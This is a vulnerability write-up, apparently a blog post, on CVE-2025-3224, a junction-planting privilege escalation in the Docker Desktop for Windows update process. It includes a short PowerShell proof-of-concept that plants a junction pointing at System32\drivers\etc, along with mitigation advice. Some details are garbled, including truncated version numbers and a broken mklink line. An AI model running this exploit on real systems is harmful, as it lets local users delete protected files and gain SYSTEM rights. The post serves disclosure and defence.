CVE-2025-3224 - Privilege Escalation in Docker Desktop for Windows Update Process

Recent research has uncovered a privilege escalation vulnerability in Docker Desktop for Windows (CVE-2025-3224). If exploited, a local, low-privileged attacker could gain SYSTEM permissions by abusing the update flow. The root cause: misuse of directory permissions and unsafe deletion logic during updates. This post breaks down the vulnerability, shows how to exploit it, and offers mitigation advice—using clear language and practical code examples.

Background

Docker Desktop for Windows provides a GUI and background services to run Linux containers on Windows hosts. Like most big applications, Docker Desktop occasionally needs high-privilege (SYSTEM) permissions for updates, configuration changes, or integration tasks.

However, improper checks on directories and permissions sometimes allow attackers to hijack these privileged operations — a classic path for Elevation of Privilege (EoP) attacks.

Vulnerability Details

CVE-2025-3224 is a path confusion issue in Docker Desktop for Windows versions before 4.41..

- During its update process, Docker Desktop tries to recursively delete everything in C:\ProgramData\Docker\config using SYSTEM rights.

Windows allows regular users to create folders in C:\ProgramData\.

- An attacker could pre-create a specially crafted directory structure at C:\ProgramData\Docker\config with symlinks or junctions.
- When Docker Desktop then runs the update as SYSTEM, it follows these links and deletes arbitrary system files — making privilege escalation (or even code execution) possible.

This attack class is known as a “Time of Check to Time of Use” (TOCTOU) or "junction planting" attack.

Vulnerable versions:
Docker Desktop for Windows before 4.41..

The attacker makes sure that C:\ProgramData\Docker\config exists. Regular users can do this.

2. Abuse Symlinks/Junctions
In place of some files or folders, the attacker creates symlinks or ‘junctions’ to sensitive SYSTEM-protected locations (for example, the Windows system configuration files or services).

Trigger the Update

The attacker either waits for Docker Desktop to auto-update, or tricks the victim/admin into launching the update.

SYSTEM Process Cleans Up

The Docker Desktop updater, running as SYSTEM, tries to "clean up" this directory—that means recursively deleting the attacker's crafted links, but actually deleting real, important system files elsewhere, or changing ownership, or exposing them to world-writable access.

Gain Privileges

With the right files deleted or replaced, the attacker can hijack services, run code as SYSTEM, or otherwise escalate privileges.

Sample Exploit Code

Note: This is for EDUCATIONAL PURPOSES ONLY. Testing this on production systems without explicit permission is illegal.

# PowerShell script to setup a junction to exploit CVE-2025-3224

$targetFolder = "C:\ProgramData\Docker\config"
$systemTarget = "C:\Windows\System32\drivers\etc"  # Example target

# 1. Create the folder structure
if (-Not (Test-Path $targetFolder)) {
    New-Item -Path $targetFolder -ItemType Directory
}

# 2. Create a junction in config that points to a protected folder
$junctionPoint = Join-Path $targetFolder "malicious"
cmd.exe /c "mklink /J &quot;$junctionPoint" &quot;$systemTarget""

Write-Host "Junction created. Now wait for Docker Desktop to update..."

# After the update, check if contents in the target are altered

What happens?
If Docker Desktop deletes everything under config, it follows the malicious junction and can remove files from C:\Windows\System32\drivers\etc (e.g., hosts file) as SYSTEM.

Update Now: Upgrade Docker Desktop for Windows to 4.41. or newer.

Docker Desktop Download Page

- Principle of Least Privilege: Limit local user accounts on production/dev machines.

- Monitor Sensitive Directories: Tools like Sysmon can alert you to unexpected directory creation/junction planting.

- Educate Users: Don’t allow untrusted users to run code on systems with high-privilege apps like Docker Desktop.

References

- Original CVE Record: CVE-2025-3224
- Docker Desktop Release Notes
- Path to SYSTEM: The Perils of Writable Folders - Project Zero Blog (similar attack field)
- Symlink/Junction Attacks on Windows

Summary

CVE-2025-3224 is a privilege escalation vulnerability in popular enterprise software. The root cause is a classic: unprotected directory creation + privileged recursive deletion = local users can take over. This bug demonstrates why it’s essential for high-privilege Windows services to never trust folders that real users can create or control.

Timeline

Published on: 04/28/2025 20:15:21 UTC
Last modified on: 05/10/2025 00:57:52 UTC